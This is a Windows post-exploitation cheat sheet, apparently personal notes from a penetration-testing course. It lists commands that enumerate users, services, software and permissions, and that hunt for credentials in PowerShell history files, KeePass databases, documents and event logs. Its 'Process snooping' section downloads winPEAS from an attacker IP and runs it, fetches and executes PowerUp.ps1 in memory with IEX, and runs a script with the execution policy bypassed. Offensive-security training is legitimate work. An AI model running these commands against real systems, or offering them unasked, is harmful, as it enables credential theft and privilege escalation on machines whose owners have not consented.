set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
Basic enum / quick wins
net user
net user <current user>
(Get-PSReadlineOption).HistorySavePath
type <previous command output>
ls C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\
Do this for all available users; Post exploitation as well
Network and port enum
netstat -ano
route print
Installed software and service enum
dir C:\
dir "C:\Program Files"
dir "C:\Program Files (x86)"
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
icacls <service binary path>
Sensitive file enum
gci -Path C:\ -Include *.kdbx,.git -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
gci -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
gci -h -Path C:\Users\ -Include *.exe,*.txt,*.rdp,*.pdf,*.xls,*.xlsx,*.xml,*.doc,*.docx,*.ps1,*.bat -File -Recurse -ErrorAction SilentlyContinue
where.exe /R C:\Windows bash.exe
where.exe /R C:\Windows wsl.exe
Process snooping
Import-Module .\Watch-Command.ps1
Get-Process | watch-command -diff -cont -verbose -property "Image Name"
curl 192.168.45.x/winPEAS.exe -o winpeas.exe
.\winpeas.exe
IEX(New-Object Net.WebClient).downloadString('http://192.168.45.x/PowerUp.ps1');Invoke-Allchecks
powershell.exe -ep bypass -NoP -c '. .\PrivescCheck.ps1; Invoke-PrivescCheck'
Last case, dig through event log for events recorded by Script Block Logging. Maybe there will be a password lol.
Applicatioins and Services
Last updated
